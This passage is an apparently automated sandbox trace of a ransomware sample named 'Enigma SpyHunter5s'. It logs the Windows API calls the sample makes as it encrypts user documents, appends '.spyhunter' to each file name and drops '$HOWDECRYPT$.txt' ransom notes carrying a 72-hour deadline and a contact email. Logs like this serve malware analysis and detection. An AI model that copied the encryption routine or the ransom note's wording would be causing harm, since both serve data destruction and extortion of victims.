wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EcceVHj.docx.spyhunter") returned 66 [0148.863] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EcceVHj.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eccevhj.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\EcceVHj.docx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\eccevhj.docx.spyhunter")) returned 1 [0148.864] GetProcessHeap () returned 0x2c0000 [0148.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.864] GetProcessHeap () returned 0x2c0000 [0148.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.864] GetProcessHeap () returned 0x2c0000 [0148.864] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d638 | out: hHeap=0x2c0000) returned 1 [0148.864] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced68 | out: pbBuffer=0x25ced68) returned 1 [0148.864] GetProcessHeap () returned 0x2c0000 [0148.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.864] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced60*=0x30) returned 1 [0148.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.864] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini") returned 55 [0148.864] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0148.864] GetProcessHeap () returned 0x2c0000 [0148.864] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.864] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced24*=0x192, lpOverlapped=0x0) returned 1 [0148.865] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe6e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.865] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x192, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced24*=0x192, lpOverlapped=0x0) returned 1 [0148.865] GetProcessHeap () returned 0x2c0000 [0148.865] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0148.865] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.865] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x25ced64*, lpNumberOfBytesWritten=0x25ced24*=0x4, lpOverlapped=0x0) returned 1 [0148.866] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced24*=0x30, lpOverlapped=0x0) returned 1 [0148.866] CloseHandle (hObject=0xa0) returned 1 [0148.866] GetProcessHeap () returned 0x2c0000 [0148.866] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.866] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.spyhunter") returned 65 [0148.866] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\desktop.ini.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\desktop.ini.spyhunter")) returned 1 [0148.867] GetProcessHeap () returned 0x2c0000 [0148.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.867] GetProcessHeap () returned 0x2c0000 [0148.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0148.867] GetProcessHeap () returned 0x2c0000 [0148.867] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a20a8 | out: hHeap=0x2c0000) returned 1 [0148.867] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced68 | out: pbBuffer=0x25ced68) returned 1 [0148.867] GetProcessHeap () returned 0x2c0000 [0148.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0148.867] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced60*=0x30) returned 1 [0148.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bd1-KTwPCWzJME-k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bd1-ktwpcwzjme-k.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.867] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bd1-KTwPCWzJME-k.pptx") returned 65 [0148.867] StrStrW (lpFirst="Bd1-KTwPCWzJME-k.pptx", lpSrch=".txt") returned 0x0 [0148.867] GetProcessHeap () returned 0x2c0000 [0148.867] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0148.867] ReadFile (in: hFile=0xa0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced24*=0x2800, lpOverlapped=0x0) returned 1 [0149.199] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.199] WriteFile (in: hFile=0xa0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced24*=0x2800, lpOverlapped=0x0) returned 1 [0149.199] GetProcessHeap () returned 0x2c0000 [0149.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.199] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.199] WriteFile (in: hFile=0xa0, lpBuffer=0x25ced64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x25ced64*, lpNumberOfBytesWritten=0x25ced24*=0x4, lpOverlapped=0x0) returned 1 [0149.200] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced24*=0x30, lpOverlapped=0x0) returned 1 [0149.200] CloseHandle (hObject=0xa0) returned 1 [0149.209] GetProcessHeap () returned 0x2c0000 [0149.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.209] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bd1-KTwPCWzJME-k.pptx.spyhunter") returned 75 [0149.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bd1-KTwPCWzJME-k.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bd1-ktwpcwzjme-k.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Bd1-KTwPCWzJME-k.pptx.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\bd1-ktwpcwzjme-k.pptx.spyhunter")) returned 1 [0149.210] GetProcessHeap () returned 0x2c0000 [0149.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.210] GetProcessHeap () returned 0x2c0000 [0149.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.210] GetProcessHeap () returned 0x2c0000 [0149.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e09318 | out: hHeap=0x2c0000) returned 1 [0149.210] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced60 | out: pbBuffer=0x25ced60) returned 1 [0149.210] GetProcessHeap () returned 0x2c0000 [0149.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.210] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced58*=0x30) returned 1 [0149.210] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NOfh9bt8aSEN6RY_Jq0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nofh9bt8asen6ry_jq0.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.211] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NOfh9bt8aSEN6RY_Jq0.m4a") returned 65 [0149.211] StrStrW (lpFirst="NOfh9bt8aSEN6RY_Jq0.m4a", lpSrch=".txt") returned 0x0 [0149.211] GetProcessHeap () returned 0x2c0000 [0149.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.211] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced1c*=0x2800, lpOverlapped=0x0) returned 1 [0149.212] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.212] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced1c*=0x2800, lpOverlapped=0x0) returned 1 [0149.212] GetProcessHeap () returned 0x2c0000 [0149.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.212] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.212] WriteFile (in: hFile=0x178, lpBuffer=0x25ced5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x25ced5c*, lpNumberOfBytesWritten=0x25ced1c*=0x4, lpOverlapped=0x0) returned 1 [0149.212] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced1c*=0x30, lpOverlapped=0x0) returned 1 [0149.212] CloseHandle (hObject=0x178) returned 1 [0149.213] GetProcessHeap () returned 0x2c0000 [0149.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.213] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NOfh9bt8aSEN6RY_Jq0.m4a.spyhunter") returned 75 [0149.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NOfh9bt8aSEN6RY_Jq0.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nofh9bt8asen6ry_jq0.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NOfh9bt8aSEN6RY_Jq0.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nofh9bt8asen6ry_jq0.m4a.spyhunter")) returned 1 [0149.214] GetProcessHeap () returned 0x2c0000 [0149.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.214] GetProcessHeap () returned 0x2c0000 [0149.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.214] GetProcessHeap () returned 0x2c0000 [0149.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e090a8 | out: hHeap=0x2c0000) returned 1 [0149.215] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced60 | out: pbBuffer=0x25ced60) returned 1 [0149.215] GetProcessHeap () returned 0x2c0000 [0149.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.215] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced58*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced58*=0x30) returned 1 [0149.215] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mug-OmJ WMd3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mug-omj wmd3.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mug-OmJ WMd3.flv") returned 58 [0149.215] StrStrW (lpFirst="Mug-OmJ WMd3.flv", lpSrch=".txt") returned 0x0 [0149.215] GetProcessHeap () returned 0x2c0000 [0149.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.216] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced1c*=0x2800, lpOverlapped=0x0) returned 1 [0149.216] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.217] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced1c*=0x2800, lpOverlapped=0x0) returned 1 [0149.217] GetProcessHeap () returned 0x2c0000 [0149.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.217] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.217] WriteFile (in: hFile=0x178, lpBuffer=0x25ced5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x25ced5c*, lpNumberOfBytesWritten=0x25ced1c*=0x4, lpOverlapped=0x0) returned 1 [0149.217] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced1c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced1c*=0x30, lpOverlapped=0x0) returned 1 [0149.217] CloseHandle (hObject=0x178) returned 1 [0149.217] GetProcessHeap () returned 0x2c0000 [0149.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.217] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mug-OmJ WMd3.flv.spyhunter") returned 68 [0149.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mug-OmJ WMd3.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mug-omj wmd3.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Mug-OmJ WMd3.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mug-omj wmd3.flv.spyhunter")) returned 1 [0149.218] GetProcessHeap () returned 0x2c0000 [0149.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.219] GetProcessHeap () returned 0x2c0000 [0149.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.219] GetProcessHeap () returned 0x2c0000 [0149.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2d0f8 | out: hHeap=0x2c0000) returned 1 [0149.219] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.219] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.220] WriteFile (in: hFile=0x178, lpBuffer=0x25cec8f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cedb8, lpOverlapped=0x0 | out: lpBuffer=0x25cec8f*, lpNumberOfBytesWritten=0x25cedb8*=0x127, lpOverlapped=0x0) returned 1 [0149.221] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0149.221] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25cedb8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25cedb8*=0x2ac, lpOverlapped=0x0) returned 1 [0149.221] CloseHandle (hObject=0x178) returned 1 [0149.221] GetProcessHeap () returned 0x2c0000 [0149.221] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2f218 | out: hHeap=0x2c0000) returned 1 [0149.225] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ced58 | out: pbBuffer=0x25ced58) returned 1 [0149.225] GetProcessHeap () returned 0x2c0000 [0149.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0149.225] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25ced50*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25ced50*=0x30) returned 1 [0149.225] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\YgSADLY3pQgezo8.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\ygsadly3pqgezo8.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.225] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\YgSADLY3pQgezo8.flv") returned 80 [0149.225] StrStrW (lpFirst="YgSADLY3pQgezo8.flv", lpSrch=".txt") returned 0x0 [0149.226] GetProcessHeap () returned 0x2c0000 [0149.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0149.226] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ced14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ced14*=0x2800, lpOverlapped=0x0) returned 1 [0149.226] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0149.227] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ced14, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ced14*=0x2800, lpOverlapped=0x0) returned 1 [0149.227] GetProcessHeap () returned 0x2c0000 [0149.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0149.227] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0149.227] WriteFile (in: hFile=0x178, lpBuffer=0x25ced54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ced14, lpOverlapped=0x0 | out: lpBuffer=0x25ced54*, lpNumberOfBytesWritten=0x25ced14*=0x4, lpOverlapped=0x0) returned 1 [0149.227] WriteFile (in: hFile=0x178, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ced14, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25ced14*=0x30, lpOverlapped=0x0) returned 1 [0149.227] CloseHandle (hObject=0x178) returned 1 [0149.227] GetProcessHeap () returned 0x2c0000 [0149.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0149.228] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\YgSADLY3pQgezo8.flv.spyhunter") returned 90 [0149.228] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\YgSADLY3pQgezo8.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\ygsadly3pqgezo8.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\YgSADLY3pQgezo8.flv.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\ygsadly3pqgezo8.flv.spyhunter")) returned 1 [0149.229] GetProcessHeap () returned 0x2c0000 [0149.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0149.229] GetProcessHeap () returned 0x2c0000 [0149.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0149.229] GetProcessHeap () returned 0x2c0000 [0149.229] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f64038 | out: hHeap=0x2c0000) returned 1 [0149.229] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\KoyoVlSv970YoDlR4y\\slaWgcRtP6wne3_w\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\koyovlsv970yodlr4y\\slawgcrtp6wne3_w\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0149.230] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0149.230] WriteFile (in: hFile=0x178, lpBuffer=0x25cec87*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25cedb0, lpOverlapped=0x0 | out: lpBuffer=0x25cec87*, lpNumberOfBytesWritten=0x25cedb0*=0x127, lpOverlapped=0x0) returned 1 [0149.231] lstrlenA 